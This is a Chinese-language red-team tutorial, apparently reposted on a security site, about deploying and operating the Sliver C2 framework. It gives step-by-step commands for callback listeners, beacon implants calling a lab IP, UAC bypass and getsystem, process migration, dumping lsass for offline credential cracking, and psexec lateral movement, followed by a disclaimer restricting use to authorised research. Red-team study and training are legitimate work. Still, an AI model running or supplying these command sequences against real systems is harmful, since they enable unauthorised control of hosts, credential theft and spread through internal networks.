红队工具研究篇–SliverC2

admin
admin
admin
0
文章
0
评论
2025-12-29 01:06:34 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了开源跨平台红队框架SliverC2的架构与部署,详细阐述了其Beacon和Session模式、多操作员协作及免杀优势。文档涵盖从监听器配置、Implant生成到后渗透阶段如提权、横向移动及内网代理的操作实战,并提供了安全配置建议,是CS替代品的深度研究。 综合评分: 89 文章分类: 红队,内网渗透,安全工具,免杀,实战经验

Listener | 监听器

启动监听器用于接收获取目标主机回连的shell,支持如下协议:

  • mTLS 相互传输层安全(mTLS)是一个建立加密TLS连接的过程,其中双方都使用X.509数字证书来验证对方。
  • HTTP
  • HTTPS
  • DNS
  • Wireguard
# 启动指定协议的监听器,配置端口
mtls -l 443

Sessions | 会话

当目标主机执行我们刚刚生成的 Implant 时,控制台中会显示一条信息,使用 use 命令连接进去,就可以进行基本的控制操作了。常见操作与我们使用 windows 和 linux 差不多,可以参考 HELP 中的提示。

use [sessions ID]

Beacons | 信标

和 Sessions 不同的是,在生成载荷的时候需要添加 beacon 参数,如下:

generate beacon --http http://172.16.181.182:9002
http -l 9002

Armory | 扩展管理器

Armory是Sliver Alias and Extension软件包管理器,它允许你自动安装各种第三方工具,如BOF和.NET工具。工具的清单可以在 Github 上找到。 安装第三方工具命令如下:

armory install rubeus

Multiplayer | 多操作员模式

生成配置文件及开启多操作员模式

# 添加操作员,生成配置文件
new-operator --name x1gua --lhost 172.16.181.182
# 启动多操作员模式,及指定端口
multiplayer
multiplayer -l 8848

3.3 后渗透利用 – Windows

Execution | 执行命令

获取到控制权后,一些常见的命令执行:

# 开启一个命令行窗口shell
shell
# 执行命令
execute -o ipconfig
# 启动一个新进程运行指定命令
runas -p "ipconfig.exe" -u "xigua" -P "123.com"

Privilege Escalation | 权限提升

绕过 UAC 及获取 SYSTEM 权限

# 上传文件并执行,绕过uac提权 [这里似乎失败了]
upload /root/Desktop/uac.ps1 "C:\Users\Administrator\Desktop\uac.ps1"
execute -o powershell -ExecutionPolicy Bypass -File "C:\Users\Administrator\Desktop\uac.ps1"
getsystem

Persistence | 持久化

进程迁移

# 查看进程列表信息
ps
# 进程迁移
migrate 3108
# 切换进程
use 244e1361

Credential Access | 凭据访问

导出 lsass.dump 信息,离线破解,需要 SYSTEM 权限。

# 导出lsass信息 [需要system权限]
procdump --pid 664 --save lsass.dump
kali> pypykatz lsa minidump lsass.dump

Discovery | 深入探索

获取网络邻居缓存条目

# 原生命令
Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress
# Sliver中执行
execute -o powershell "Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress"

其余的和内网渗透一致,这里就不展开了

Lateral Movement | 横向移动

这里以 psexec 横向移动为例,进行演示。

# 创建配置文件
profiles new --format service --skip-symbols --mtls 172.16.181.182 psexec_test
# 执行psexec攻击
psexec -profile pentest --service-name pentest -service-description pentest red.team

本地环境,有些配置没有开启四、后续研究

通过本文,相信读者已经可以自行部署 Sliver C2 及快速上手,多实验几次就会对其中常见的功能和命令了如指掌。 但是! 这只是 Sliver C2 研究的开始,之所以可以被称作为 Cobalt Strike 的替代品,必然有其过人的能力,在后续的文章中,将介绍它的扩展功能,包括但不限于使用BOFs and COFFs、各协议通信时数据包分析、植入物免杀能力的深入研究和实战中的利用等,总之,关于这款工具的使用技巧将会慢慢分享出来。

往期推荐

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:泷羽Sec xigua《红队工具研究篇 – Sliver C2》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0